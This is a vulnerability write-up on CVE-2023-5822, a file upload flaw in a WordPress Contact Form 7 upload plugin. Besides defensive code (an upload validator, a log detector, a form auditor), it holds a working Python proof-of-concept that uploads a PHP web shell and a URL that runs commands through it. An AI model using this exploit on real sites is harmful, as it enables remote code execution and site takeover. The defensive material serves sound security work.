The WordPress plugin “Drag and Drop Multiple File Upload – Contact Form 7” is widely used by site admins to offer smooth file uploads through the popular Contact Form 7 plugin. At the end of 2023, however, a major vulnerability surfaced that allows unauthenticated file uploads — potentially leading to remote code execution. Let's go deep into CVE-2023-5822: how it works, proof-of-concept code, and how you can defend your site.

What is CVE-2023-5822?

CVE-2023-5822 is a critical security flaw in the plugin “Drag and Drop Multiple File Upload – Contact Form 7” (up to and including version 1.3.7.3). It affects sites where a file upload field has been configured permissively (using * as the accepted file type) by an authorized user (Editor or higher).

- Authentication required for setup: yes (Editor or higher), but the upload itself is unauthenticated once the field is exposed
- CVE: CVE-2023-5822

How Does the Exploit Work?

Normally, file upload fields restrict file types for security (like jpg, png, pdf). However, if someone with *editor* rights sets the field's accepted file types to * (any file), the plugin's backend function skips proper file validation.

The main function at issue is dnd_upload_cf7_upload, which does not check file extensions or MIME types correctly when * is configured. That means any file, including PHP scripts, can be uploaded and placed in an accessible directory.

So, if an attacker finds such a form on your site, they can send a hand-crafted request and upload a PHP shell. If the server executes this file, the attacker gets remote code execution.
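The checks the plugin skipped when filetypes was set to * are easier to see in code. The following is an added example written for this post, not the plugin's own dnd_upload_cf7_upload function; the allowlist, the executable-extension list and the magic-byte table are illustrative assumptions. It refuses a wildcard outright, checks every extension in the filename (so shell.php.jpg is caught), verifies the content's leading bytes against the claimed type, and strips path components:

```python
import os

# Allowlist a form author would configure; the wildcard "*" that made
# CVE-2023-5822 exploitable is refused by parse_filetypes() below.
DEFAULT_ALLOWED = {"jpg", "jpeg", "png", "gif", "pdf"}

# Extensions that must never be written into a web-served uploads directory,
# whatever the form author configured. (Illustrative list, not the plugin's.)
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "php8",
                         "phtml", "phar", "pht", "phps"}

# Leading bytes expected for each allowed type, used to confirm that the
# content really is what the extension claims.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}


def parse_filetypes(option):
    """Parse a Contact Form 7 style filetypes option such as "jpg|png|pdf".

    A wildcard is rejected instead of meaning "accept anything", which is the
    behaviour the vulnerable configuration relied on.
    """
    if "*" in option:
        raise ValueError("wildcard file types are not permitted")
    types = {t.strip().lower().lstrip(".") for t in option.split("|") if t.strip()}
    if not types:
        raise ValueError("empty file type list")
    return types


def validate_upload(filename, content, allowed):
    """Return (accepted, reason) for one uploaded file."""
    # Keep only the base name so "../../x.png" cannot escape the upload directory.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        return False, "empty or hidden filename"
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]
    # Every extension in the name is checked, so "shell.php.jpg" is rejected too.
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, "executable extension"
    ext = exts[-1]
    if ext not in allowed:
        return False, "extension ." + ext + " not in allowlist"
    magic = MAGIC.get(ext)
    if magic is not None and not content.startswith(magic):
        return False, "content does not match extension"
    # Belt and braces: refuse PHP open tags even inside a type-valid file.
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP tag"
    return True, "ok"


if __name__ == "__main__":
    allowed = parse_filetypes("jpg|png|pdf")
    # Constructed inputs: a PHP file, a minimal JPEG header, and mismatches.
    for name, data in [("evil.php", b"<?php echo 1; ?>"),
                       ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
                       ("photo.jpg", b"<?php echo 1; ?>"),
                       ("shell.php.jpg", b"\xff\xd8\xff\xe0")]:
        print(name, validate_upload(name, data, allowed))
```

The decisive difference from the vulnerable behaviour is that the allowlist is the only thing that can admit a file: there is no configuration value that turns the checks off.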

Proof-of-Concept (PoC) Exploit

Never run exploit code against servers you do not own or have explicit permission to test. The following is a sample exploit for educational use.

Suppose the vulnerable form's upload field URL is https://target-site.com/wp-admin/admin-ajax.php?action=dnd_upload_cf7_upload

Here is a simple Python proof-of-concept:

import requests

# Change this to the site's AJAX endpoint
url = "https://target-site.com/wp-admin/admin-ajax.php?action=dnd_upload_cf7_upload"

# PHP shell code
php_payload = "<?php echo shell_exec($_GET['cmd']); ?>"

files = {
    'files[]': (
        'evil.php',
        php_payload,
        'application/x-php'
    )
}

response = requests.post(url, files=files)

if response.status_code == 200 and "evil.php" in response.text:
    print("[+] File uploaded successfully!")
    # You should now find the file URL in the response, or by guessing from the plugin's upload path.
else:
    print("[-] Upload failed.")

After upload, visit something like https://target-site.com/wp-content/uploads/dnd-upload-files/evil.php?cmd=whoami to run code on the server.
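That two-step sequence (a POST to the plugin's AJAX action, then a request for a .php file under wp-content/uploads) is also what a defender should look for in web server logs. The following detection example is added here and is not from the original post; the log lines are constructed, the upload path is the one quoted above, and the ten-minute correlation window is an assumption. Any request for a server-side script under the uploads directory is flagged, and the severity is raised when the same client hit the upload action shortly before:

```python
import re
from datetime import datetime

# Constructed combined-format access log lines (not real traffic). The first
# pair mirrors the sequence the post describes: an unauthenticated POST to the
# plugin's AJAX action, then a request for a .php file under the uploads path.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Nov/2023:16:20:01 +0000] "POST /wp-admin/admin-ajax.php?action=dnd_upload_cf7_upload HTTP/1.1" 200 312 "-" "python-requests/2.31.0"
203.0.113.7 - - [22/Nov/2023:16:20:03 +0000] "GET /wp-content/uploads/dnd-upload-files/evil.php?cmd=whoami HTTP/1.1" 200 54 "-" "python-requests/2.31.0"
198.51.100.4 - - [22/Nov/2023:16:21:10 +0000] "POST /wp-admin/admin-ajax.php?action=dnd_upload_cf7_upload HTTP/1.1" 200 290 "https://example.test/contact/" "Mozilla/5.0"
198.51.100.4 - - [22/Nov/2023:16:21:12 +0000] "GET /contact/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
192.0.2.50 - - [22/Nov/2023:17:02:44 +0000] "GET /wp-content/uploads/dnd-upload-files/test.php HTTP/1.1" 404 196 "-" "curl/8.4.0"
192.0.2.9 - - [22/Nov/2023:17:10:00 +0000] "GET /wp-content/uploads/2023/11/brochure.pdf HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
UPLOAD_ACTION = "action=dnd_upload_cf7_upload"
UPLOADS_PREFIX = "/wp-content/uploads/"
# Server-side script extensions, allowing for a trailing query string.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\?|$)", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def detect(lines, window_seconds=600):
    """Flag requests for scripts under wp-content/uploads; raise the severity
    when the same client hit the plugin's upload action within the window."""
    alerts = []
    last_upload_post = {}  # client IP -> time of its most recent upload POST
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        ip, path = e["ip"], e["path"]
        if e["method"] == "POST" and "/admin-ajax.php" in path and UPLOAD_ACTION in path:
            last_upload_post[ip] = e["ts"]
            continue
        if path.startswith(UPLOADS_PREFIX) and SCRIPT_EXT.search(path):
            severity = "medium"  # scripts should never be served from uploads
            prev = last_upload_post.get(ip)
            if prev is not None and 0 <= (e["ts"] - prev).total_seconds() <= window_seconds:
                severity = "high"  # upload action followed by an execution attempt
            alerts.append({"ip": ip, "path": path, "status": e["status"],
                           "user_agent": e["ua"], "severity": severity})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(a["severity"].upper(), a["ip"], a["status"], a["path"])
```

A 200 on the flagged request means the server actually executed (or at least served) the file, so those alerts deserve immediate triage; a 404 still tells you someone is probing for the plugin's upload path. The legitimate visitor who submits the contact form and then reloads the page produces no alert.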

Vulnerability Example: Misconfigured Form Field

If an editor-level user builds a form with a *multiple file upload* field and configures it like this inside Contact Form 7:

[dnd_upload* your-upload-file filetypes:*]

then any file can be uploaded — no restrictions.

Impact

- No authentication needed: once misconfigured, anyone on the internet can exploit it.
- WordPress privilege escalation: code execution could let attackers create admin accounts, steal data, or wipe your site.

Mitigation

- Update the plugin immediately: the vulnerability is patched in version 1.3.7.4 and above (see the WordPress Plugin Repository).
- Restrict file uploads: always specify exact extensions (e.g., jpg, png, pdf) instead of *.
- Regularly audit plugins and users: reduce unnecessary Editor/Admin accounts.
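Auditing every Contact Form 7 template by hand for the permissive dnd_upload tag shown above does not scale, so here is an added example (not part of the original post or the plugin) that scans a form template for dnd_upload tags whose filetypes option is a wildcard, missing, or includes a server-side executable extension, and rewrites only the offending tags to an explicit allowlist. The sample template is constructed; the limit: option in it is assumed for illustration, and the dangerous-extension list is an assumption.

```python
import re

# Matches a dnd_upload form tag in a Contact Form 7 template, e.g.
#   [dnd_upload* your-upload-file filetypes:*]
TAG_RE = re.compile(r"\[(dnd_upload\*?)\s+([^\s\]]+)((?:\s+[^\s\]]+)*)\]")
OPTION_RE = re.compile(r"([\w-]+):(\S+)")

# Extensions a public upload field must never accept: server-side executable,
# or able to change server behaviour when dropped into the uploads directory.
DANGEROUS = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar",
             "pht", "phps", "htaccess"}

# Constructed template for demonstration; "limit:" is an assumed extra option.
SAMPLE_TEMPLATE = """\
<label> Your name [text* your-name] </label>
<label> Attachments [dnd_upload* your-upload-file filetypes:* limit:10485760] </label>
<label> Resume [dnd_upload resume filetypes:pdf|docx] </label>
<label> Misc [dnd_upload misc-files filetypes:jpg|php|png] </label>
[submit "Send"]
"""


def classify_filetypes(filetypes):
    """Return a problem description for a filetypes value, or None if acceptable."""
    if filetypes is None:
        return "no explicit filetypes allowlist"
    if "*" in filetypes:
        return "wildcard accepts any file type"
    bad = sorted({t.lower().lstrip(".") for t in filetypes.split("|")} & DANGEROUS)
    if bad:
        return "allows executable types: " + ", ".join(bad)
    return None


def audit_form(template):
    """List every dnd_upload tag whose file type configuration is unsafe."""
    findings = []
    for m in TAG_RE.finditer(template):
        name, opts = m.group(2), m.group(3)
        options = dict(OPTION_RE.findall(opts))
        issue = classify_filetypes(options.get("filetypes"))
        if issue:
            findings.append({"field": name, "issue": issue, "tag": m.group(0)})
    return findings


def harden_form(template, allowed="jpg|png|pdf"):
    """Rewrite unsafe dnd_upload tags to an explicit allowlist; leave safe ones alone."""
    def fix(m):
        tag, name, opts = m.group(1), m.group(2), m.group(3)
        options = dict(OPTION_RE.findall(opts))
        if classify_filetypes(options.get("filetypes")) is None:
            return m.group(0)
        rest = re.sub(r"\s+filetypes:\S+", "", opts)  # other options are preserved
        return "[" + tag + " " + name + " filetypes:" + allowed + rest + "]"
    return TAG_RE.sub(fix, template)


if __name__ == "__main__":
    for f in audit_form(SAMPLE_TEMPLATE):
        print(f["field"] + ": " + f["issue"] + "  " + f["tag"])
    print(harden_form(SAMPLE_TEMPLATE))
```

Running the audit over the templates stored for each form (in a WordPress install they live in the post content of the wpcf7_contact_form post type, which you would export or query with WP-CLI) gives a quick inventory of which fields need attention before, not after, an attacker finds them.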

References

- NVD – CVE-2023-5822
- Patchstack Disclosure Details
- WPScan Advisory

Final Thoughts

CVE-2023-5822 is a wake-up call for WordPress site owners. Even popular plugins can have dangerous flaws when misconfigured. Always review your plugins, update regularly, and be cautious with file upload functionalities. Limiting accepted file types is a big step toward keeping your site safe.

Timeline

Published on: 11/22/2023 16:15:15 UTC
Last modified on: 11/29/2023 19:15:14 UTC